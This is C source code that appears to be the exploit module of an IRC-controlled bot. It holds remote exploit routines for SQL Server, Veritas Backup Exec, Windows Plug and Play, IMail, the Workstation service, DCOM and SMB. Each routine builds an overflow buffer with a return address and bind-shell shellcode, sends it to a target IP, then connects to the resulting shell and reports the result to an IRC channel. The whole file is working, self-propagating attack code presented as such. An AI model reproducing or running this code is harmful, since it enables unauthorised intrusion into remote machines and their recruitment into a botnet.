BOOL thcsql(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
unsigned int sock,rc;
struct sockaddr_in sqludp;
if ((sock=fsocket(AF_INET,SOCK_DGRAM,IPPROTO_UDP))==INVALID_SOCKET)
return FALSE;
sqludp.sin_family=AF_INET;
sqludp.sin_addr.s_addr=finet_addr(exinfo.ip);
sqludp.sin_port=fhtons(exinfo.port);
if ((rc=fconnect(sock, (struct sockaddr *)&sqludp, sizeof(struct sockaddr_in)))=SOCKET_ERROR)
{
if(rc==0)
{
fsend(sock,badbuffer,sizeof(badbuffer)-1,0);
Sleep(1000);
if (ConnectShell(exinfo, 31337))
{
exploit[exinfo.exploit].stats++;
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
fshutdown(sock,1);
fclosesocket(sock);
return FALSE;
}
bool veritasbackupserver(EXINFO exinfo) {
SOCKET sock;
if ((sock = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == SOCKET_ERROR) return false;
SOCKADDR_IN sin;
memset(&sin, 0, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_port = fhtons((unsigned short)exinfo.port);
sin.sin_addr.s_addr = finet_addr(exinfo.ip);
char payload[800];
char v91sp0sp1[]="\xFF\x50\x11\x40";
char esisp0sp1[]="\xA1\xFF\x42\x01";
memcpy(&talk[37], &v91sp0sp1, 4);
memcpy(&talk[72], &esisp0sp1, 4);
//os="Backup Exec v9.1.4691.1\n[+] Backup Exec v9.1.4691.0";
strcpy(payload,veritassc);
if (fconnect(sock, (LPSOCKADDR)&sin, sizeof(sin)) == SOCKET_ERROR) return false;
if (fsend(sock,talk,sizeof(talk)-1,0)==SOCKET_ERROR) return false;
Sleep(10);
for (int i=0; i < 7;i++) {
if (fsend(sock,payload,sizeof(payload),0) == SOCKET_ERROR) return false;
Sleep(10);
}
Sleep(1000);
fclosesocket(sock);
ConnectShell(exinfo,101);
return (AddEx(exinfo,true));
}
BOOL PnP( char *target, void* conn, EXINFO exinfo, int OffNum )
{
SOCKADDR_IN addr;
int len;
int sockfd;
unsigned short smblen;
char tmp[1024];
unsigned char packet[4096];
unsigned char *ptr;
char recvbuf[4096];
IRC* irc=(IRC*)conn;
BOOL success=FALSE;
char* thisTarget;
int pnpbindsize=405;
int TargetOS, Target;
char* tOS="";
WSADATA wsa;
fWSAStartup(MAKEWORD(2,0), &wsa);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET) return FALSE;
thisTarget = exinfo.ip;
TargetOS=FpHost(thisTarget,FP_NP);
if (TargetOS==OS_UNKNOWN)
TargetOS=FpHost(thisTarget,FP_SMB);
if (TargetOS == OS_WINNT){
Target=OS_WINNT;
success=FALSE;
}else if (TargetOS==OS_WINXP){
Target=OS_WINXP;
success=FALSE;
}else if (TargetOS==OS_WIN2K){
Target=OS_WIN2K;
success=TRUE;
}else{
success=FALSE;
}
ZeroMemory(&addr,sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_addr.s_addr = finet_addr(thisTarget);
addr.sin_port = fhtons((unsigned short)exinfo.port);
if (fconnect(sockfd, (struct sockaddr *)&addr, sizeof(struct sockaddr)) < 0) return FALSE;
if (fsend(sockfd, (const char *)SMB_Negotiate, sizeof(SMB_Negotiate)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX, sizeof(SMB_SessionSetupAndX)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if (len <= 10) return FALSE;
if (fsend(sockfd, (const char *)SMB_SessionSetupAndX2, sizeof(SMB_SessionSetupAndX2)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
ptr = packet;
memcpy(ptr, SMB_TreeConnectAndX, sizeof(SMB_TreeConnectAndX)-1);
ptr += sizeof(SMB_TreeConnectAndX)-1;
sprintf(tmp,"\\\\%s\\IPC$",thisTarget);
convert_name((char *)ptr, tmp);
smblen = strlen(tmp)*2;
ptr += smblen;
smblen += 9;
memcpy(packet + sizeof(SMB_TreeConnectAndX)-1-3, &smblen, 1);
memcpy(ptr, SMB_TreeConnectAndX_, sizeof(SMB_TreeConnectAndX_)-1);
ptr += sizeof(SMB_TreeConnectAndX_)-1;
smblen = ptr-packet;
smblen -= 4;
memcpy(packet+3, &smblen, 1);
if (fsend(sockfd, (char *)packet, ptr-packet, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PipeRequest_browser, sizeof(SMB_PipeRequest_browser)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
if (fsend(sockfd, (char *)SMB_PNPEndpoint, sizeof(SMB_PNPEndpoint)-1, 0) < 0) return FALSE;
len = frecv(sockfd, recvbuf, 4096, 0);
if ((len <= 10) || (recvbuf[9] != 0)) return FALSE;
// nop
ptr = packet;
memset(packet, '\x90', sizeof(packet));
// Start prepare header -- dETOX mod --
memcpy(RPC_call + 260, Offsets[OffNum], 4);
// header & offsets
memcpy(ptr, RPC_call, sizeof(RPC_call)-1);
ptr += sizeof(RPC_call)-1;
// shellcode
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
memcpy(ptr,bindshell,pnpbindsize-1);
// end of packet
memcpy( packet + 2196 - sizeof(RPC_call_end)-1 + 2,
RPC_call_end,
sizeof(RPC_call_end)-1);
// sending...
if (fsend(sockfd, (char *)packet, 2196, 0) < 0) return FALSE;
frecv(sockfd, recvbuf, 4096, 0);
if (!exinfo.silent && exinfo.verbose){
switch(Target){
case 1:
tOS="WINNT";
break;
case 2:
tOS="WIN2K";
break;
case 3:
tOS="WINXP";
break;
default:
tOS="UNKNOWN/2K3/LINUX";
break;
}
irc->privmsg(target,"%s %s: Target OS is %s... (%s).", scan_title, exploit[exinfo.exploit].name, tOS, exinfo.ip);
}
// if(success){
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// }
return TRUE;
}
BOOL iMail( char *target, void* conn,EXINFO exinfo )
{
IRC* irc=(IRC*)conn;
char szBanner[512];//, szShellcode[512];
int iRemoteTarget;
int ibindsize=405;
SOCKET sSocket;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Beginning attack on %s",exinfo.ip);Sleep(1500);
SOCKADDR_IN sinSockAddrIn;
memset(&sinSockAddrIn, 0, sizeof(sinSockAddrIn));
sinSockAddrIn.sin_family = AF_INET;
sinSockAddrIn.sin_addr.s_addr = finet_addr(exinfo.ip);
sinSockAddrIn.sin_port = fhtons(exinfo.port);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Initializing IP and port for %s:%d",exinfo.ip,exinfo.port);Sleep(1500);
if(!(sSocket = fWSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, NULL, NULL)))
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Creating Socket for %s",exinfo.ip);Sleep(1500);
if(fconnect(sSocket, (LPSOCKADDR)&sinSockAddrIn, sizeof(sinSockAddrIn)) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Connecting to socket for %s",exinfo.ip);Sleep(1500);
if(frecv(sSocket, szBanner, sizeof(szBanner), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Getting Banner for %s",exinfo.ip);Sleep(1500);
if (strstr(szBanner,"IMail 7.04"))
iRemoteTarget = 0;
else if (strstr(szBanner,"IMail 7.05"))
iRemoteTarget = 1;
else if (strstr(szBanner,"IMail 7.06"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.07"))
iRemoteTarget = 2;
else if (strstr(szBanner,"IMail 7.10"))
iRemoteTarget = 3;
else if (strstr(szBanner,"IMail 7.11"))
iRemoteTarget = 4;
else if (strstr(szBanner,"IMail 7.12"))
iRemoteTarget = 5;
else if (strstr(szBanner,"IMail 7.13"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.14"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 7.15"))
iRemoteTarget = 6;
else if (strstr(szBanner,"IMail 8.00"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.01"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.02"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.03"))
iRemoteTarget = 7;
else if (strstr(szBanner,"IMail 8.04"))
iRemoteTarget = 8;
else if (strstr(szBanner,"IMail 8.05"))
iRemoteTarget = 9;
else if (strstr(szBanner,"IMail 8.10"))
iRemoteTarget = 10;
else if (strstr(szBanner,"IMail 8.11"))
iRemoteTarget = 12;
else if (strstr(szBanner,"IMail 8.12"))
iRemoteTarget = 13;
else if (strstr(szBanner,"IMail 8.13"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.14"))
iRemoteTarget = 14;
else if (strstr(szBanner,"IMail 8.15"))
iRemoteTarget = 15;
else
iRemoteTarget = -1;
if (!exinfo.silent && exinfo.verbose) irc->privmsg(target,"Banner for %s is %s, iRemoteTarget is %d",exinfo.ip,szBanner,iRemoteTarget);Sleep(1500);
memcpy(szImailPacket + 12, bindshell, ibindsize -1);
if (iRemoteTarget == -1) return FALSE;
if (pImailTargets[iRemoteTarget].iSEHAddress == 0)
memcpy(szImailPacket + 700, &pImailTargets[iRemoteTarget].lOffset, 4);
else
if (pImailTargets[iRemoteTarget].iSEHAddress == 1)
memcpy(szImailPacket + 692, &pImailTargets[iRemoteTarget].lOffset, 4);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Crafting Malicious Packet for %s",exinfo.ip);Sleep(1500);
if(fsend(sSocket, szImailPacket, sizeof(szImailPacket), 0) == SOCKET_ERROR)
return FALSE;
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Malicious packet for %s sent",exinfo.ip);Sleep(1500);
fclosesocket(sSocket);
if (!exinfo.silent && exinfo.verbose)irc->privmsg(target,"Socket Closed for %s",exinfo.ip);Sleep(1500);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
} else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
return FALSE;
}
//BOOL ScriptGod_WKSSVC(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
BOOL sgwkssvc(unsigned long nTargetID,EXINFO exinfo,char *target, void* conn)
{
IRC* irc=(IRC*)conn;
//irc->privmsg(target,"%s %s: Connected to IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
BOOL success=FALSE;
int TargetOS;
// char szShellBuf[ 512 ];
int iShellSize;
// =============================
char* pszTarget;
// ---
char szNetbiosTarget[ 8192 ];
wchar_t wszNetbiosTarget[ 8192 ];
unsigned char szShellcodeEncoded[ ( 405 * 2 ) + 1 ];
unsigned char szExploitsData[ 3500 ];
unsigned long nExploitsDataPos;
wchar_t wszExploitsData[ sizeof( szExploitsData ) ];
// ---
char szIPC[ 8192 ];
NETRESOURCE NetSource;
// ---
char szPipe[ 8192 ];
HANDLE hPipe;
// ---
RPC_ReqBind BindPacket;
unsigned long nBytesWritten;
RPC_ReqNorm ReqNormalHeader;
unsigned long nPacketSize;
unsigned char* pPacket;
unsigned long nPacketPos;
// ============================
TargetOS = FpHost(exinfo.ip, FP_PORT5K);
if(TargetOS != OS_WINXP)
TargetOS = FpHost(exinfo.ip, FP_RPC);
if(TargetOS != OS_WINXP)
return FALSE;
else
success=TRUE;
// irc->privmsg(target,"%s %s: Target running XP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
// parameters
pszTarget=exinfo.ip;
// char URL[MAX_HOSTNAME];
// char fname[_MAX_FNAME];
// sprintf(fname,"eraseme_%d%d%d%d%d.exe",rand()%9,rand()%9,rand()%9,rand()%9,rand()%9);
// _snprintf(URL,sizeof(URL),
// "ftp://*****:*****@%s:%d/%s",
// (PrivateIP(exinfo.ip)?inip:exip),FTP_PORT,fname);
unsigned short port;
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&port,2);
iShellSize=wbindsize;//setup_shellcode_udtf(szShellBuf, sizeof(szShellBuf), URL, false, NULL);
if (!iShellSize)
return FALSE;
// get shellcode
//iShellSize = GetRNS0TerminatedShellcode( szShellBuf, sizeof( szShellBuf ), GetIP( exinfo.sock ), filename );
//if( !iShellSize )
// return FALSE;
// generate exploits buffer
// ========================
ZeroMemory(szShellcodeEncoded, sizeof(szShellcodeEncoded));
ZeroMemory(szExploitsData, sizeof(szExploitsData));
ZeroMemory(wszExploitsData, sizeof(wszExploitsData));
// fill with NOPs (using inc ecx instead of NOP, 0-terminated-string)
memset(szExploitsData,'A',sizeof(szExploitsData)-1);
// new EIP
*(unsigned long*)(&szExploitsData[Targets[nTargetID].nNewEIP_BufferOffset]) = Targets[nTargetID].nNewEIP;
// some NOPs
nExploitsDataPos = 2300;
// add stack
memcpy( &szExploitsData[ nExploitsDataPos ], szStack, sizeof( szStack ) - 1 );
nExploitsDataPos += sizeof( szStack ) - 1;
// add decoder
memcpy( &szExploitsData[ nExploitsDataPos ], szDecoder, sizeof( szDecoder ) - 1 );
nExploitsDataPos += sizeof( szDecoder ) - 1;
// add shellcode
// - bind port
// - encode
Encode( (unsigned char*)bindshell, iShellSize, szShellcodeEncoded );
// - add
memcpy( &szExploitsData[ nExploitsDataPos ], szShellcodeEncoded, strlen( (char*)szShellcodeEncoded ) );
nExploitsDataPos += strlen( (char*)szShellcodeEncoded );
// - 0 terminaten for decoder
szExploitsData[ nExploitsDataPos ] = 0;
nExploitsDataPos += 1;
// convert to UNICODE
// ==================
for( int n = 0; n < sizeof( szExploitsData ); n++ )
wszExploitsData[ n ] = szExploitsData[ n ];
//MultiByteToWideChar( CP_ACP, 0, (char*)szExploitsData, -1, wszExploitsData, sizeof( wszExploitsData ) / sizeof( wchar_t ) );
_snprintf(szNetbiosTarget,sizeof(szNetbiosTarget), "\\\\%s", pszTarget);
mbstowcs(wszNetbiosTarget,szNetbiosTarget, sizeof(wszNetbiosTarget)/sizeof(wchar_t));
// create NULL session
// ===================
if( strcmpi( pszTarget, "." ) )
{
//_snprintf(szIPC,sizeof(szIPC), "\\\\%s\\", pszTarget);
_snprintf(szIPC,sizeof(szIPC),"\\\\%s\\",pszTarget);
strncat(szIPC,"ipc$",sizeof(szIPC));
ZeroMemory(&NetSource,sizeof(NetSource));
NetSource.lpRemoteName = szIPC;
fWNetAddConnection2(&NetSource,"","",0);
}
// ===================
// connect to pipe
// ===============
//_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\pipe\\wkssvc",pszTarget);
_snprintf(szPipe,sizeof(szPipe),"\\\\%s\\",pszTarget);
strncat(szPipe,"pipe\\wkssvc",sizeof(szPipe));
hPipe = CreateFile(szPipe, GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, 0, NULL);
if(hPipe == INVALID_HANDLE_VALUE)
{
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===============
// bind packet
// ===========
ZeroMemory(&BindPacket,sizeof(BindPacket));
BindPacket.NormalHeader.versionmaj = 5;
BindPacket.NormalHeader.versionmin = 0;
BindPacket.NormalHeader.type = 11; // bind
BindPacket.NormalHeader.flags = 3; // first + last fragment
BindPacket.NormalHeader.representation = 0x00000010; // little endian
BindPacket.NormalHeader.fraglength = sizeof(BindPacket);
BindPacket.NormalHeader.authlength = 0;
BindPacket.NormalHeader.callid = 1;
BindPacket.maxtsize = 4280;
BindPacket.maxrsize = 4280;
BindPacket.assocgid = 0;
BindPacket.numelements = 1;
BindPacket.contextid = 0;
BindPacket.numsyntaxes = 1;
BindPacket.Interface1.version = 1;
memcpy(BindPacket.Interface1.byte, "\x98\xd0\xff\x6b\x12\xa1\x10\x36\x98\x33\x46\xc3\xf8\x7e\x34\x5a", 16);
BindPacket.Interface2.version = 2;
memcpy(BindPacket.Interface2.byte, "\x04\x5d\x88\x8a\xeb\x1c\xc9\x11\x9f\xe8\x08\x00\x2b\x10\x48\x60", 16);
// send
if(!WriteFile(hPipe, &BindPacket, sizeof( RPC_ReqBind ), &nBytesWritten, NULL))
{
//irc->privmsg(target,"%s %s: !WriteFile: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle(hPipe);
fWNetCancelConnection2(NetSource.lpRemoteName, 0, FALSE);
return FALSE;
}
// ===========
// request
// =======
// generate packet
// ---------------
// calc packet size
nPacketSize = 0;
nPacketSize += sizeof( szWKSSVCUnknown1 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
while(nPacketSize % 4)
nPacketSize++;
if(Targets[nTargetID].bCanUse_NetAddAlternateComputerName)
nPacketSize += sizeof( szWKSSVCUnknown2 ) - 1;
nPacketSize += sizeof( UNISTR2 );
nPacketSize += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
while( nPacketSize % 4 )
nPacketSize++;
nPacketSize += 8; // szWSSKVCUnknown3
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
nPacketSize += 4; // NetAddAlternateComputerName = reserved
else
nPacketSize += 2; // NetValidateName = NameType
// alloc packet
pPacket = (unsigned char*)malloc( nPacketSize );
if( !pPacket )
{
//irc->privmsg(target,"%s %s: !malloc: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
ZeroMemory(pPacket,nPacketSize);
// build packet
nPacketPos = 0;
// - szWKSSVCUnknown1
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown1, sizeof( szWKSSVCUnknown1 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown1 ) - 1;
// - wszNetbiosTarget
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszNetbiosTarget ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszNetbiosTarget );
nPacketPos += ( wcslen( wszNetbiosTarget ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWKSSVCUnknown2
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
memcpy( &pPacket[ nPacketPos ], szWKSSVCUnknown2, sizeof( szWKSSVCUnknown2 ) - 1 );
nPacketPos += sizeof( szWKSSVCUnknown2 ) - 1;
}
// - wszExploitsData
( (UNISTR2*)&pPacket[ nPacketPos ] )->length = wcslen( wszExploitsData ) + 1;
( (UNISTR2*)&pPacket[ nPacketPos ] )->unknown = 0;
( (UNISTR2*)&pPacket[ nPacketPos ] )->maxlength = ( (UNISTR2*)&pPacket[ nPacketPos ] )->length;
nPacketPos += sizeof( UNISTR2 );
wcscpy( (wchar_t*)&pPacket[ nPacketPos ], wszExploitsData );
nPacketPos += ( wcslen( wszExploitsData ) + 1 ) * sizeof( wchar_t );
// - align
while( nPacketPos % 4 )
nPacketPos++;
// - szWSSKVCUnknown3 (only eigth 0x00s)
ZeroMemory(&pPacket[nPacketPos],8);
nPacketPos += 8;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
{
// NetAddAlternateComputerName = 0
*(DWORD*)&pPacket[ nPacketPos ] = 0;
nPacketPos += sizeof( DWORD );
}
else
{
// NetValidateName = NetSetupMachine
*(unsigned short*)&pPacket[ nPacketPos ] = 1;
nPacketPos += 2;
}
// header
ZeroMemory(&ReqNormalHeader,sizeof(ReqNormalHeader));
ReqNormalHeader.NormalHeader.versionmaj = 5;
ReqNormalHeader.NormalHeader.versionmin = 0;
ReqNormalHeader.NormalHeader.type = 0; // request
ReqNormalHeader.NormalHeader.flags = 3; // first + last fragment
ReqNormalHeader.NormalHeader.representation = 0x00000010; // little endian
ReqNormalHeader.NormalHeader.authlength = 0;
ReqNormalHeader.NormalHeader.callid = 1;
ReqNormalHeader.prescontext = 0;
if( Targets[ nTargetID ].bCanUse_NetAddAlternateComputerName )
ReqNormalHeader.opnum = 27; // NetrAddAlternateComputerName
else
ReqNormalHeader.opnum = 25; // NetrValidateName2
// send
if( !SendReqPacket_Part( hPipe, ReqNormalHeader, pPacket, nPacketSize, 4280, true ) )
{
//irc->privmsg(target,"%s %s: !SendReqPacket_Part: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
return FALSE;
}
// =======
// clean up
// =================;
CloseHandle( hPipe );
free( pPacket );
fWNetCancelConnection2( NetSource.lpRemoteName, 0, FALSE );
if (success)
{
Sleep(5000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
return TRUE;
}
BOOL scvx(char *target, void* conn,EXINFO exinfo)
{
IRC* irc=(IRC*)conn;
SOCKET sockfd;
// int gport;
int len, len1, TargetOS;
unsigned short port = 135;
char *buf1="0x001";
char *buf2="0x001";
char lport[] = "\x00\xFF\xFF\x8b";
struct sockaddr_in their_addr;
unsigned short tport;
unsigned char *sc;
TargetOS = FpHost(exinfo.ip, FP_SMB);
if (TargetOS == OS_WIN2K3)
{
//type = 0;
// gport=fhtons(bindport);
// memcpy(&lport[1], &gport, 2);
// *(long*)lport = *(long*)port^0x9432BF80;
// memcpy(&sc[471],&lport,4);
tport=fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176],&tport,2);
sc=(unsigned char *)bindshell;
// memcpy(sc+36, (unsigned char *) &dcomtargets[type].ret, 4);
their_addr.sin_family = AF_INET;
their_addr.sin_addr.s_addr = finet_addr(exinfo.ip);
their_addr.sin_port = fhtons(port);
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
if (fconnect(sockfd, (LPSOCKADDR)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
return FALSE;
len=strlen((const char*)sc);
memcpy(buf2,fcr,sizeof(fcr));
len1=sizeof(fcr);
*(unsigned long *)(mmps)=*(unsigned long *)(mmps)+strlen((const char*)sc)/2;
*(unsigned long *)(svcd+8)=*(unsigned long *)(svcd+8)+strlen((const char*)sc)/2;
memcpy(buf2+len1,mmps,sizeof(mmps));
len1=len1+sizeof(mmps);
memcpy(buf2+len1,sc,strlen((const char*)sc));
len1=len1+strlen((const char*)sc);
memcpy(buf2+len1,sc1,sizeof(sc1));
len1=len1+sizeof(sc1);
memcpy(buf2+len1,svcd,sizeof(svcd));
len1=len1+sizeof(svcd);
*(unsigned long *)(buf2+8)=*(unsigned long *)(buf2+8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x10)=*(unsigned long *)(buf2+0x10)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x80)=*(unsigned long *)(buf2+0x80)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x84)=*(unsigned long *)(buf2+0x84)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb4)=*(unsigned long *)(buf2+0xb4)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xb8)=*(unsigned long *)(buf2+0xb8)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0xd0)=*(unsigned long *)(buf2+0xd0)+strlen((const char*)sc)-0xc;
*(unsigned long *)(buf2+0x18c)=*(unsigned long *)(buf2+0x18c)+strlen((const char*)sc)-0xc;
if ((sockfd = fsocket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == INVALID_SOCKET)
return FALSE;
len=frecv(sockfd, buf1, 1000, 0);
if (fsend(sockfd,buf2,len1,0)== -1)
return FALSE;
fclosesocket(sockfd);
Sleep(2000);
if (ConnectShell(exinfo,bindport))
{
if (!exinfo.silent)
irc->privmsg(target,"%s %s: Exploiting IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
exploit[exinfo.exploit].stats++;
}
else
{
if (!exinfo.silent && exinfo.verbose)
irc->privmsg(target,"%s %s: Failed to exploit IP: %s.", scan_title, exploit[exinfo.exploit].name, exinfo.ip);
}
}
return TRUE;
}
BOOL Exploit(EXINFO exinfo, SOCKET sockfd, int which)
{
int i, opt=0;
char hostipc[40];
char hostipc2[40*2];
unsigned short port;
unsigned char *sc;
char buf[LEN+1];
char sendbuf[(LEN+1)*2];
char req4u[sizeof(req4)+20];
char screq[BUFSIZE+sizeof(req7)+1500+440];
char screq2k[4348+4060];
char screq2k2[4348+4060];
char recvbuf[1600];
char strasm[]="\x66\x81\xEC\x1C\x07\xFF\xE4";
char strBuffer[BUFSIZE];
unsigned int targetnum=0;
int len;
char smblen;
char unclen;
sprintf((char *)hostipc,"\\\\%s\\ipc$", exinfo.ip);
for (i=0; i<40; i++) {
hostipc2[i*2] = hostipc[i];
hostipc2[i*2+1] = 0;
}
memcpy(req4u, req4, sizeof(req4)-1);
memcpy(req4u+48, &hostipc2[0], strlen(hostipc)*2);
memcpy(req4u+47+strlen(hostipc)*2, req4+87, 9);
smblen = 52+(char)strlen(hostipc)*2;
memcpy(req4u+3, &smblen, 1);
unclen = 9 + (char)strlen(hostipc)*2;
memcpy(req4u+45, &unclen, 1);
port = fhtons(bindport)^(USHORT)0x9999;
memcpy(&bindshell[176], &port, 2);
sc = (unsigned char *)bindshell;
if (which != TARGET_XP)
{
memset(buf, NOP, LEN);
//memcpy(&buf[2020], "\x3c\x12\x15\x75", 4);
memcpy(&buf[2020], &ttarget[which].jmpaddr, 4);
memcpy(&buf[2036], sc, strlen((const char *)sc));
memcpy(&buf[2840], "\xeb\x06\xeb\x06", 4);
memcpy(&buf[2844], &ttarget[which].jmpaddr, 4); // jmp ebx addr
//memcpy(&buf[2844], "\x3c\x12\x15\x75", 4); // jmp ebx addr
memcpy(&buf[2856], sc, strlen((const char*)sc));
for (i=0; i<LEN; i++) {
sendbuf[i*2] = buf[i];
sendbuf[i*2+1] = 0;
}
sendbuf[LEN*2]=0;
sendbuf[LEN*2+1]=0;
memset(screq2k, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
memset(screq2k2, 0x31, (BUFSIZE+sizeof(req7)+1500)*2);
}
else
{
memset(strBuffer, NOP, BUFSIZE);
memcpy(strBuffer+160, sc, strlen((const char*)sc));
memcpy(strBuffer+1980, strasm, strlen(strasm));
*(long *)&strBuffer[1964]=ttarget[which].jmpaddr;
}
memset(screq, 0x31, BUFSIZE+sizeof(req7)+1500);
if (fsend(sockfd, req4u, smblen+4, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0);
if (fsend(sockfd, req5, sizeof(req5)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0);
if (fsend(sockfd, req6, sizeof(req6)-1, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0);
if (which != TARGET_XP) {
memcpy(screq2k, req8, sizeof(req8)-1);
memcpy(screq2k+sizeof(req8)-1, sendbuf, (LEN+1)*2);
memcpy(screq2k2, req9, sizeof(req9)-1);
memcpy(screq2k2+sizeof(req9)-1, sendbuf+4348-sizeof(req8)+1, (LEN+1)*2-4348);
memcpy(screq2k2+sizeof(req9)-1+(LEN+1)*2-4348-sizeof(req8)+1+206, shit3, sizeof(shit3)-1);
if (fsend(sockfd, screq2k, 4348, 0) == -1)
return FALSE;
len = frecv(sockfd, recvbuf, sizeof(recvbuf), 0);
if (fsend(sockfd, screq2k2, 4060, 0) == -1)
return FALSE;
} else {
memcpy(screq, req7, sizeof(req7)-1);
memcpy(screq+sizeof(req7)-1, &strBuffer[0], BUFSIZE);
memcpy(screq+sizeof(req7)-1+BUFSIZE, shit1, 9*16);
screq[BUFSIZE+sizeof(req7)-1+1500-304-1] = 0;
if (fsend(sockfd, screq, BUFSIZE+sizeof(req7)-1+1500-304, 0)== -1)
return FALSE;
}
Sleep(3000);
if (ConnectShell(exinfo,bindport))
return TRUE;
return FALSE;
}
